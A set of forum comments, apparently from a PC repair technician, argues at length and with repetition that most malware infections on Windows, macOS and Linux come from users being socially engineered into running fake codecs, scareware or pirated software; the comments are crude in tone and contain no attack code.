Linux won't save you, in fact there are websites that show you how to make a bug in 5 easy steps by using the dancing bunny, mac won't save you either as we saw with DNSChanger and MacDefender/Guardian, in the end security all comes to to the user. why would the user pay even 10c for their data to be secured when frankly they will hand over the keys to the kingdom for the offer of a dancing bunny? I had to come up with a free porn site just to keep the "Iz-not_Viruz_iz_codex" bugs from infecting guys, I've seen girls run strange programs offered them in chat sessions by strangers because it was supposed to be some match 3 or a "free' version of some popular game like Angry birds or Plants Vs Zombies, this is why I've had to spend so much time learning how to keep as many decisions OUT of the hands of the user as possible, because frankly the word security never even crosses their minds, not if you offer a dancing bunny.

Hell these websites could put "Not only are we gonna sell your data but we are gonna send a 600 pound silverback over to rape you while we film it for Youtube" and as long as they had some stupid thing to offer the user, some stupid game or chat or like FB a chance to blather on about themselves? they'd happily sign anything you want them to. Hell look at how many FB apps have been coming up with some truly insane demands, post as you, access to ALL of your data AND all the data of any friends, etc, and yet i get idiots I knew in HS and old GFs wanting me to use these crazy apps constantly. when i ask them 'Didn't you even read what it requires to use?" they are all "huh? what? but its cool!". Sadly while security takes real work blowing it all to hell takes only one dumbass a few minutes to crap all over it. if ugly is to the bone then dumbass must be to the molecule!

I have to wonder if he is a bot, which i still think mickey incremental UID is. Just like "Mikey" has the same script over and over, the "Use piece of original text + pathetic" so too do this one just copy pasta over and over. Surely a real troll would throw a change up now and then, or change a line or two.

As for TFA before any of the lame "Use Linux" karma whores show up as someone who actually fixes the thing when they get pwned 6 days a week I'd just like to point out that since XP SP2 a lot of the machines getting pwned were PEBKAC and after Vista the vast majority were PEBKAC and with 7 its almost 100% PEBKAC and sadly no OS can magically protect you from stupid people.

Here is the main causes of infections, at least walking into my shop but talking to other shopkeeps they are seeing the same: 1.- The "you want teh hot lesbos? you need to run our Iz_not_Viruz_iz_codec.exe to play teh vidz!" 2.- The "ZOMG you got teh viruz! To fix run our Iz_not_Viruz_iz_cleanerz.exe to get rid of it ZOMG!" 3.-The "Use the new Limewire (Iz_not_Viruz_iz_Limewirez) to download teh latest Titney_Spearz.mp3.exe tunez today!" and 4.-"Hey my BFF sent me a funny cat video in chat! It says I should run Iz_not_Viruz_iz_LOLCatz to see teh kittiez!"

Notice how in ALL of the above you don't need an exploit, and in fact you could replace .exe with .sh and pwn a Linux machine just as easily? before anyone says 'they'd need root!" you need that with Windows now too remember? the users happily give it root because they want the cookie, or the porn, or the silly cat video. As both the hardware and software gets better with security with features like ASLR,DEP, low rights mode browsing by default, etc the malware guys figured out the best way to beat security is....don't bother, just let the moron behind the desk do it FOR you. And as we saw with MacDefender and the KDELook bug it really doesn't matter what OS, as long as you offer the right cookie. For those that don't live in perception bubbles allow me to offer you "How to write a linux virus Part 1 and part 2 which actually explains better than I can basic social engineering tricks that work just about anywhere.

Now working with customers since before there even WAS a Windows or Linux i've realized that its pretty much impossible to make a hack proof OS that is useful to the masses. i can make it harder, much harder to pwn, by putting Comodo CIS or Avast Free along with switching them to a low rights mode browser like Chromium or Dragon, I can even make it easier to recover if they think they made a boo boo by installing comodo time machine in its own hidden partition, but in the end the simple fact is if the user has install rights you are at the mercy of the user and whether or not they have taken a stupid pill today, full stop. And believe me folks there are some doozies out there, i had to order one guy out of my shop and threaten to call the cops because he kept demanding i fix that new machine i just sold him for free since it was pwned in less than 24 hours. How did that happen? did I miss something? Nope after i told him flat footed that limewire was shut down by the feds years ago and anything that said it was Limewire was a virus he promptly went home, got on the web, and when the AV refused to let him install "the new limewire' he promptly first tried to disable followed by uninstalling said AV, then was shocked, shocked i tell you! that he ended up with 100+ pieces of malware. His argument was 'It says right there that there is a new limewire so dammit you should make it work!"

so remember folks when you hear all these woogy boogy here is a bug stories that there are tons of folks that have been running for ages and in fact will have a machine go through its entire life cycle without so much as adware and that these guys have figured out there are literally hundreds of thousands like my

I have to wonder if he is a bot, which i still think mickey incremental UID is. Just like "Mikey" has the same script over and over, the "Use piece of original text + pathetic" so too do this one just copy pasta over and over. Surely a real troll would throw a change up now and then, or change a line or two.

As for TFA before any of the lame "Use Linux" karma whores show up as someone who actually fixes the thing when they get pwned 6 days a week I'd just like to point out that since XP SP2 a lot of the machines getting pwned were PEBKAC and after Vista the vast majority were PEBKAC and with 7 its almost 100% PEBKAC and sadly no OS can magically protect you from stupid people.

Here is the main causes of infections, at least walking into my shop but talking to other shopkeeps they are seeing the same: 1.- The "you want teh hot lesbos? you need to run our Iz_not_Viruz_iz_codec.exe to play teh vidz!" 2.- The "ZOMG you got teh viruz! To fix run our Iz_not_Viruz_iz_cleanerz.exe to get rid of it ZOMG!" 3.-The "Use the new Limewire (Iz_not_Viruz_iz_Limewirez) to download teh latest Titney_Spearz.mp3.exe tunez today!" and 4.-"Hey my BFF sent me a funny cat video in chat! It says I should run Iz_not_Viruz_iz_LOLCatz to see teh kittiez!"

Notice how in ALL of the above you don't need an exploit, and in fact you could replace .exe with .sh and pwn a Linux machine just as easily? before anyone says 'they'd need root!" you need that with Windows now too remember? the users happily give it root because they want the cookie, or the porn, or the silly cat video. As both the hardware and software gets better with security with features like ASLR,DEP, low rights mode browsing by default, etc the malware guys figured out the best way to beat security is....don't bother, just let the moron behind the desk do it FOR you. And as we saw with MacDefender and the KDELook bug it really doesn't matter what OS, as long as you offer the right cookie. For those that don't live in perception bubbles allow me to offer you "How to write a linux virus Part 1 and part 2 which actually explains better than I can basic social engineering tricks that work just about anywhere.

Now working with customers since before there even WAS a Windows or Linux i've realized that its pretty much impossible to make a hack proof OS that is useful to the masses. i can make it harder, much harder to pwn, by putting Comodo CIS or Avast Free along with switching them to a low rights mode browser like Chromium or Dragon, I can even make it easier to recover if they think they made a boo boo by installing comodo time machine in its own hidden partition, but in the end the simple fact is if the user has install rights you are at the mercy of the user and whether or not they have taken a stupid pill today, full stop. And believe me folks there are some doozies out there, i had to order one guy out of my shop and threaten to call the cops because he kept demanding i fix that new machine i just sold him for free since it was pwned in less than 24 hours. How did that happen? did I miss something? Nope after i told him flat footed that limewire was shut down by the feds years ago and anything that said it was Limewire was a virus he promptly went home, got on the web, and when the AV refused to let him install "the new limewire' he promptly first tried to disable followed by uninstalling said AV, then was shocked, shocked i tell you! that he ended up with 100+ pieces of malware. His argument was 'It says right there that there is a new limewire so dammit you should make it work!"

so remember folks when you hear all these woogy boogy here is a bug stories that there are tons of folks that have been running for ages and in fact will have a machine go through its entire life cycle without so much as adware and that these guys have figured out there are literally hundreds of thousands like my

So in other words you answer is "Linux is magical and never gets bugs so don't update it" correct? care to

explain these my friend? protip: NO OS is secure without being patched NONE.I'd also point out the KDELook bug of year before last, oh and here is a nice little how to for writing Linux bugs.

But thank you for posting, yours is a PERFECT example of why linux on the desktop is as dead as disco. When pointed out the myriad of problems the community simply sticks their fingers in their ears and goes "La la la, CLI is leet! You don't know, you are noob, you are not leet! You must be a M$ Ninja dirty poo poo head!". would you like me to link to the OEMs that have abandoned Linux, including Asus which started the whole netbook craze? just ask and its yours, maybe you can explain how the ENTIRE PLANET is wrong and you're right.

I don't want a smartphone at all, apparently they are quite dangerous

If they have to do all of that? Its pointless there are easier ways to pwn a machine. For Windows its as easy as "ZOMG! You got teh viruz! Run "Iz_Not_Viruz_iz_Cleaner.exe' to kill it ZOMG!" or "U want teh tittez and lezbos? We got teh tittez and lezbos and so can u! Just run "Iz_Not_Bug_iz_Codec.exe' and enjoy all teh tittez and lezbos today!" and for Linux the social engineering is a little different but idea is the same and the end result is a pwned machine, see the KDE screensaver malware that went around a couple of years back, or the infected Q III arena code that actually was sitting on one of the repos being passed out for quite awhile before it got caught.

In the end it would simply be easier to get the user to help pwn the machine FOR you than jump through this many hoops. Hell between social engineering, adobe products, and "JavaScript malware o' the day" there are now more than ever far easier ways to make a machine yours than deal with THIS much hoop jumping, it simply wouldn't be worth the effort if you can't somehow automate it.

Uhhh...tell me how EXACTLY telling the equivalent of "water is wet" a MSFT propaganda piece? You sir might want to read this article on OSNews by the title of OS X - Safe, Yet Horribly Insecure or is OSNews MSFT propaganda? it points out the Apple implementations of serveral technologies, when it has them, simply aren't up to snuff. Technologies such as DEP and ASLR either are not implemented or are implemented poorly.

Now Apple was able to get away with that with relative impunity simple because they weren't worth the effort as malware writers like most criminals are a lazy sort of creature and will ALWAYS go for the biggest bang for the least work. It is like that old saying, you rob banks because that is where the money is. You attack Windows because it has been trivially easy to get little Suzy to run your "LOL_Kittehs.screensaver.exe" trojan nasty.

Is this REALLY so surprising? It isn't like any of the other OSes have held up very well when being targeted either. On OSX you had MacDefender followed by MacGuardian which caused Apple to give their infamous order to the Applecare guys "Do NOT say the word Malware and do NOT help those....people!" and on the Linux side we've seen Android pounded pretty regularly as well as the KDELook screensaver bug someone put out for shits and giggles awhile back, as well as this article that shows how trivial it is to infect Linux if you get the user to help you which is how nearly all modern nasties spread nowadays.

So why hasn't Linux and OSX been pounded before now? it ain't brain surgery folks it is because it just wasn't worth the effort for sub double digit userbases. And before some Linux fanboi trots out the old "but but but...Linux is used on servers!" I would point out you don't see Linux admins running "LOL_Kitteh.Screensaver.py" and if you do they should be given a nice white jacket and placed somewhere where they can't hurt anyone. We are talking DESKTOPS, not servers, routers, your toaster, or your remote controlled Linux thermostat. DESKTOPS are were the money is at for malware writers, because they have nice fat broadband connections they don't monitor for shit, they are MUCH more likely to be clueless about best security practices, much more likely to run funny software from the net if you wave a cookie in front of them, etc. it is simply easy money whereas grizzled non-sociable Linux admins don't play that.

So saying Windows is targeted because that is where the money is at is no different than saying the sky is blue and water is wet. If you want an easy target grandma on WinXP is about as easy as you can get. to their credit someone at MSFT FINALLY got hit with the clue stick and the whole "Hey lets all run as admins!" bullshit finally died with Vista, and now that I've switched the majority of my customers and family to Windows 7 I've seen infection rates go waaaaaay down. Did I magically give them a brain transplant? did my years of bashing my head against the wall trying to teach them best security practices FINALLY get through their heads? oh hell no! It is the fact MSFT makes the default a regular user now and has tech like ASLR, DEP, file and registry virtualization, and you can even do as I did and add SEHOP from Server 2K8 to Windows 7 to lock it down even tighter. this with a good sandboxing AV like Comodo or Avast free and we finally have a decent OS that is pretty locked down.

Now that Windows will be getting harder as XP is replaced by 7 it will be OSX's turn to start to worry. Apple being hip has gotten through to some who saw after MacDefender there is money there, and like blood in the water to sharks they WILL come.

Next time someone tells you "Linux can't get bugs!" you just point them to this page which gives you how to write a Linux virus in 5 easy steps using plain old fashioned social engineering, the same stuff that I can confirm from my years of working repair is how the vast majority of Windows PCs get pwned.

It is actually extremely simple and logical if fanbois would only take a minute to think, instead of waving their Tux flags or iFlags or WinFlags...ALL OSes are extremely complex layers of code where even Torvalds himself can't tell you with 100% certainty what happens step by step when you launch a user mode application and then on top of all this complexity you add third party code and finally add the weakest link, the user him/herself and what do you get? Why a pwned machine of course!

All you can do is use defense in depth, use best security practices, and have frequent backups so that if the user bypasses all your defense so they can have the "LOL Kitteh!" screensaver with a trojan onboard you're ready to clean it up. I'd argue OOTB Win 7 is more secure than Linux or OSX, simply because MSFT learned from previous mistakes and now you have UAC ASLR, DEP, etc, etc. As you said SELinux or AppArmor would give the same protection but quickly becomes a royal PITA and you'll likely run into programs hanging like you do when trying to run XP as non admin.

Did you miss the earlier article on how Apple got iOS rooted in a single day? Or maybe the KDELook malware that went around a couple of years back? How about hot to write a Linux virus in 5 easy steps?

Protip: ALL OSes can and WILL be pwned simply because they are extremely complex interacting systems and nobody, not even Torvalds and the heads of Apple and MSFT engineering can tell you EXACTLY what every possible interaction with each subsystem will output simply because our computers do more than ever before with multicores, GPUs made up of dozens to hundreds of stream processors, and tons of third party code running on top of it all.

As someone who fixes infected PCs 6 days a week and just got done cleaning out another security tool variant let me give you this observation from experience on where most of the malware gets into the PC...PEBKAC.The big attack vectors i'm seeing day after day, in no particular order, is: 1.- The "you want teh hot lesbos? you need to run our Iz_not_Viruz_iz_codec.exe to play teh vidz!" 2.- The "ZOMG you got teh viruz! To fix run our Iz_not_Viruz_iz_cleanerz.exe to get rid of it ZOMG!" 3.-The "Use the new Limewire (Iz_not_Viruz_iz_Limewirez) to download teh latest Titney_Spearz.mp3.exe tunez today!" and 4.-"Hey my BFF sent me a funny cat video! It says I should run Iz_not_Viruz_iz_LOLCatz to see teh kittiez!"

As you will notice with ALL of the above you simply don't have to bother with an exploit for ANY of those, as the user IS the exploit and is the weakest link. The last major "WTF?" that MSFT had, the "Hey lets run everybody as admin!" officially died with Vista and since 7 doesn't bug the crap out of folks with "Cancel/allow?" boxes every three seconds UAC has been left on and along with low rights mode in IE and Chromium based is doing a good job, as we saw by the numbers released the other week where there are only 4 per 1000 7 machines infected VS 14 for XP.

But as long as you have people willing to ignore or even turn off their AV (as I had the other week with a customer and the "Iz_Not_Bug_Iz_Limewire") because a malware writer waved a cookie in front of them then frankly I don't see what else can be done besides what MSFT is already doing with the free MSRT and MSE. And as we have seen with first MacDefender and now MacGuard (which doesn't even need the password anymore) on OSX and the nasty Android trojan apps it doesn't matter whether you are on an alternative OS or not, all that matters is whether or not the bad guys want in bad enough to do the work and whether you have any users who'll run "Iz_Not_Bug_Iz" style apps. sadly I've found that WAAAY too many are more than happy to do just that. Will this bounty crap work? Who knows, I think the money would be better served paying researchers to tear the botnet's guts apart and trace their way back, but they say there is no honor among thieves.

And I apologize about the length, I just find it incredibly ridiculous that anyone still believe ANY company, be it Apple, Google, or MSFT, can wave a magic wand and make PEBKAC disappear. There have been attempts at education (MSFT puts out plenty warning about email attachments and other major attack vectors) there have been attempts to lock the user away from anything bad (Apple) and using Linux to stop malware (Google with Android) and ALL HAVE FAILED. All you can do is cut down the risks as best you can and be ready to clean up the mess when Forest Gump ignores you to "see teh tittiez!"

Think OSX is immune? Read TFA. Think Linux can't be pwned? Look at the Android malware or the KDE screensaver malware that spread awhile back or even this handy how to guide on writing Linux malware.

Still bringing that one up hairyfeet? Isn't it the case that the desktop launcher vector was shut down a long, long time ago? While the article you reference is dated 11-Feb-2009 and so can be excused, it's now 2011, the vector doesn't work, and so isn't relevant here. As I asked last time, time to update your bag.

So in the end it doesn't matter what the OS, it doesn't matter what kind of permissions model you set up, if you have someone with admin rights that says "I want my emails from Melissa and you WILL let me have them!" then no matter what OS, you're screwed. An OS is only as good as the PEBKAC sitting in front of it.

Computers are here for users, not users are here for computers. Given that, we obviously can't completely remove the PEBCAK aspect of computer security. So as you note, all OS's have the PEBCAK chink in their armor to a degree, but that doesn't mean because end users can be foolish we should accept easily compromisable OS's.

If an OS has a problem with drive-by's then that's bad. When I hear of OSX being hit hard by them, I'll then considerer it as being closer to the Windows security threat level.

Actually, and I'll probably get flamed for saying this, you'd be surprised how many have bought the "you just can't infect a Mac!" meme. I got called into an SMB a few years back, where the guy instead of listening to me and paying me to set up a sensible top to bottom least permission approach bought into the "can't infect a Mac!" meme and then was shocked! shocked I tell you, when he found out he got pwned thanks to one of his kids wanting to watch a naughty video and getting the DNS changer bug.

You see the problem is something we that have been in the trenches for quite awhile (I started with Win 3.x, what was that? 20 years ago?) sadly run into far too often, it is what I like to call "magical thinking". it is the "If I use product X I won't have to change my habits or anything, and I'll be unhackable" bullshit. Hell I remember when firewall resellers were pushing the "if you have a firewall you are invisible and untouchable!" and it was bullshit then and it is bullshit now.

NEWS FLASH...ALL OSes can be hacked, full stop. ALL OSes are extremely complex pieces of code, with interactions on top of interactions with third party code thrown in the mix just for shits and giggles. There is NO perfectly unhackable OS and if there was one that person could hire Bill Gates to shine his shoes. The last real legitimate gripe about Windows, the brain dead "hey lets run everyone as admin!" finally died hard with Vista, so frankly all OSes are on about the same footing, as in TFA it all comes down to what the malware writer thinks is profitable.

Think OSX is immune? Read TFA. Think Linux can't be pwned? Look at the Android malware or the KDE screensaver malware that spread awhile back or even this handy how to guide on writing Linux malware.

The ONLY solution is a top to bottom least permissions approach, not magical thinking. Least permissions and users not being so brain dead they actively help the malware writer is the ONLY solution.

As a final note let me give a recent example. I set up a box, had it locked down nicely, required password for admin, least permissions, yet it got pwned in under 45 days. Did I miss something? Nope, the user decided he just had to have Limewire, even though I told him not to, so he disabled the antivirus because it wouldn't in his words "shut up" and then promptly gave permissions to Limewire to do whatever it wanted. And boy did it, 60+ pieces of malware.

So in the end it doesn't matter what the OS, it doesn't matter what kind of permissions model you set up, if you have someone with admin rights that says "I want my emails from Melissa and you WILL let me have them!" then no matter what OS, you're screwed. An OS is only as good as the PEBKAC sitting in front of it.

Actually I'd say the problem isn't Windows, it is PEBKAC which NO OS will solve or they would have done so by now. I just got finished cleaning one of these scareware infections where the user uninstalled their working AV to install the malware. Now why would they do that you say? Simple, they saw the number of "infections" reported on the fake scareware page and decided their good AV must not be working (since it wasn't reporting the non existent viruses) and therefor " must have gone bad" like cheese in the fridge and tossed it to install the malware.

Now show me ANY OS that would protect the system from that level of stupid, I dare you. You can't because idiot proofing will always be defeated by the bigger idiot. For Linux here is a nice trick, how to write a Linux virus in 5 easy steps that uses nothing but bog standard social engineering. hell it doesn't even need root to be able to do all the things your average malware writer wants to accomplish. And we know this works because they used similar methods in the KDELook attack, where thousands of KDE users were infected by fake screensavers that were actually malware. Sound familiar?

So it is real simple folks, if the user has install rights then they have the ability to screw themselves, full stop. You can try education, making them jump through hoops like UAC or root prompts, it doesn't matter. it is the classic dancing bunnies problem where if the user WANTS the malware (and that is what it all boils down to, the malware uses fear or social engineering to convince the user they want to install the malware, a classic con game) then by God they're gonna get that malware whether you like it or not!

So in the end you do what you can, make sure they have a backup solution, and be ready to clean up the messes when they happen. it reminds me of how an old Linux admin of mine ended up being threatened with firing and had to show up before the head of the regional office because the PHB over him was demanding he allow the PHB's emails from Melissa without interference. In the end there is only so much you can do, you just can't knock the stupid out of some folks.

Exactly and I would argue the next big malware attacks most likely will simply ignore trying to get root as new features like ASLR and DEP make it harder to use the old tricks like buffer overflows.

And the simple fact is to do most of the stuff your average malware writers want to do (send spam, steal data, etc) it isn't even needed. See this example of how to write a Linux virus in 5 easy steps with no need for root, just good old social engineering like we see every day, and it will autorun, send spam, do anything the malware writer wants to do.

So I would argue the reason we saw so many viruses running as root before was because it was easy to obtain root and now that that is not the case malware in the future simply won't bother and will instead do its damage from userland.

Look, you want to see me blow through your famous Linux security like shit through a goose? Well here you go tada! Using the exact same tricks as they use on Windows and as simple as opening an email attachment (sound familiar?) I can royally fuck your Linux OS. Send spam, alter files, set myself up to autostart. Gee, doesn't this sound like Windows?

The ONLY reason you don't see malware writers using this trick (which BTW they have in the past, look up "KDE theme virus" to see for yourself) is because you have to have basic computer and problem solving skills because Linux is a PITA as a desktop so you have to know how to trawl forums for fixes, use CLI to install and fix driver issues, etc. The fact that you have to learn and understand at least a basic understanding of Linux (or have an admin with said knowledge) means the odds of getting enough infections to be worth the work is rather slim.

To use an old quote you rob banks because that is where the money is and if you want to build a 200,000 strong botnet you don't go to the OS that has less than the margin for error marketshare to start and with more geeks and CS grads than Sally Clueless users to boot. it is simple numbers my friend, or are you one of those that says the reason Macs with the vaunted BSD security fall first on pwn2own is that people would risk losing a 10,000 prize just to win a $2300 Macbook?

The ONLY reason Linux isn't an infected mess is social engineering like I pointed out above which works 100% on Linux needs clueless users to work and there are less of those to go around. I'd say wait until you get the numbers but with all the infighting and factionalism of the community I doubt you'll get past 4% anyway, sorry. But as Android gets popular and drags in the clueless you WILL see more infections, mark my words. If the target is juicy the malware writers WILL hit it and despite all the "Linux runs the web" BS the simple fact is you get better bandwidth for longer by pwning home connections since they don't monitor their connections like server admins do.

Hi Cosm! Sadly I wish that it was, but as someone who has been in the repair biz since Win3.x it is all too true. hell I'll give you a perfect example of why social engineering works: I had a customer with me sitting right exactly there telling her specifically "Do NOT open that password protected zip and run it, it is a virus!" and got told "Oh you're just paranoid, see the name? My BFF Kim sent this to me! Kim wouldn't do that!" and so she ignored me AND the AV which was practically trying to hurl itself between her and the bug and did EXACTLY what I told her not to and promptly pwned her own machine.

So sadly my friend I can state with 100% certainty it is NOT a myth or old wives tale, it is all too real. Look up the top 10 list of malware by installation and then look to see how they infect and you'll find a good 8 out of 10 if not 10 out of 10 rely on the user to pwn themselves by ignoring best practices, ignoring the EULA, never reading anything, and just blindly clicking next to continue.

The latest nasty going around is the "Security tool" variant which is installed on MILLIONS of machines and which I see at least 3 times a week, all done using the "ZOMG! u got teh bugz! Install 'is_not-viruz.exe" to kill it ZOMG!" and that damned thing is installed on millions of PCs using that lame BS tactic. No shit. Sad but true my friend, sad but true. And Linux security wouldn't do a damned thing, in fact here is How to write a Linux virus in 5 easy steps using the same tricks and it WILL work because so many refuse to think.

Allow me to show you what would happen if banks switched to requiring Ubuntu tomorrow, I give you how to write a Linux virus in just 5 easy steps tada! You just got pwned!

It really is simple: Windows gets hit because that is where the easy marks are and if you switch everyone over tomorrow then by default you bring the easy marks to Linux and the famous Linux security gets turned to crapola 3 minutes later.

As a PC repairman I see the nasties that hit Windows every day, you know what the biggest two are BY FAR? The "ZOMG You got teh Viruz! Run "this_iz_not_a_viruz.exe" to kill it quick! ZOMG!" and the ever popular "Enjoy free (insert new movies, music, porn) all you want just by installing out "this_is_not_a_viruz_codec.exe" today!" Now how in any way shape or form will Linux protect the user from social engineering attacks or from running outdated third party software like Flash or Reader? Gonna hold a gun to their head and force them to update? Hell Windows has had automatic updates for over a decade yet I still see XP SP2 machines cross my desk.

The simple facts are these: as long as the user has the right to install software he also has the right to royally screw the pooch when it comes to malware. Linux by default because it is more "fiddly" and because one has to do step by step troubleshooting with it like go to forum, find relevant topic, launch bash, apply fix, has users that know more about their OS internals and are more security minded. It ain't rocket science folks. Windows got rid of the last legitimate complaint, forcing users to run as admins, more than 3 years ago. But as long as the majority of home and business users have no clue how anything works you are gonna see bugs on whatever OS is dominant because that is where the clueless are. Just look at how we are seeing more malware for Android now that it is becoming popular. With the users come the malware, simple as that. And switching to Linux won't magically give the user a level up in IT knowledge.

Well that and the fact that there are some seriously stupid users on Windows. Believe me I knowshe opened and ran a password protected zip file with me sitting right exactly there and telling her "What are you doing? Don't open that! It's a virus!" and I got "Its from my BFF Kim, and she wouldn't do that! Stop being so paranoid." and then promptly infected the living hell out of her machine.

So Linux guys, be happy where you are. Drop to your knees and thank RMS that Linux is still CLI heavy in Ubuntu if anything goes wrong, and the whole Linux setup seems "too hard" for the average Windows user. Be glad, oh dear Lord be glad. Because if you ever manage to lure them over the malware writers will be right behind them and your pretty OS will be turned into a giant festering turd. because users like that will happily run "Happy_Puppy.sh" or "Hot_Porn.py" and follow the nice instructions the virus writers hand them.

Hell you can write a Linux virus in 5 easy steps just by using the social engineering that I see every damned day on Windows. With those kinds of users all the fancy security in the world is worthless, because they are more than happy to follow instructions if they think they get a goodie at the end...shudder...

So while I'm glad that MSFT killed autorun frankly I can't remember the last time I saw it used as an attack vector on a PC I had to work on. Nowadays it is usually the "ZOMG! U got teh Viruz! Run this "Viruzkillz.exe" to kill it!!!" Or the classic "Having trouble viewing the free porn? Just run the "Supercodec.exe" to get all the free action right now!!!". Man they fall for those two every time..

I'm sorry but that is bullshit. I have to deal with those user 6 days a week and frankly as long as they have control over their box they WILL do whatever they please, security be damned. It is the classic dancing bunnies problem and I don't care which OS you use they WILL blow right through your security measures if they want to see the bunny.

I have had a customer open a password protected zip file with me standing there telling them its a virus "because this was sent to me by my BFF Kim and she wouldn't do that" and if you think Linux or any other OS would do better allow me to submit for your consideration How to write a Linux virus in 5 easy steps using the same social engineering which causes the vast majority of infections on Windows.

Bottom line if the user wants to run it they WILL run it, and the only way to prevent that would be to take away ALL rights to the machine and make it into trusted computing. Now since trusted computing (or treacherous computing as RMS calls it) would take away all rights from the user and kill OSes that allowed the four freedoms dead we simply have to accept the fact that stupid is as stupid does.

Not to say adding security isn't a good idea, I'm personally switching my customers and family to Windows 7 and the file and registry virtualization along with low rights mode in Chromium does safeguard against things that don't require user action like JavaScript exploits and drivebys, but frankly nothing will stop the user actively installing malware if they are so inclined. And I can tell you that at my shop I'd say probably 85%+ of the malware on PCs is installed by the user themselves, either by using social engineering or by offering the user something they desire, such as free porn or software. All the security in the world isn't gonna help if the source of the infection is PEBKAC.

Before you break your arm patting yourself on the back congratulating yourself on your super security you might want to read this which shows how to write a Linux virus in just 5 easy steps that will be just as nasty as a Windows bug and then maybe you'll remember the problem isn't Windows but PEBKAC.

I should know I fix the things 6 days a week and I'd say that more than 90% of the bugs that cross my desk were installed by the user either through scare tactics or through the promise of porn or free stuff. I'd say a good 80% of the rest were infected by outdated third party software like Java, Flash and Reader which frankly nobody ever updates. The "your flash is out of date! Run 'pwnme.exe' to get the lates verson!" is quite popular at the moment, as well as "ZOMG! U got teh Viruz! Run 'Viruzfker.exe' to kill the ZOMG Viruz quick!!".

So in conclusion before the smugness chokes us out here let me say this: You better drop to your knees and thanks Linus and RMS that Linux isn't popular because if you got the huge teeming masses of unwashed rabble onto your OS it would come falling down like a house of cards by...oh I'd say 3:45PM tomorrow. Faster than you can say "Oh shit!" there would be emails with "free_titties.sh" and "Happy_Puppies_screensaver.py" with nice little instructions that the user would follow without thought and your precious security would be so much Swiss Cheese.

It is the classic dancing bunnies problem and if anyone could solve it they would be richer than Gates. I have seen an AV practically throw itself in front of a user trying to stop them only to have them completely disable it because the malware offered something they wanted. Linux won't protect from that level of stupidity sorry. Hell you can't even blame it on Windows running as admin anymore since both Vista and 7 don't allow the user to run as admin but instead use the Linux model of only elevating for install yet the users put in their password and install the bugs anyway no matter how much the AV and OS tries to do to stop them.

TLDR you can't solve social engineering with tech, just as you can't solve 419 email scams with filters. Stupid is as stupid does Forest, stupid is as stupid does.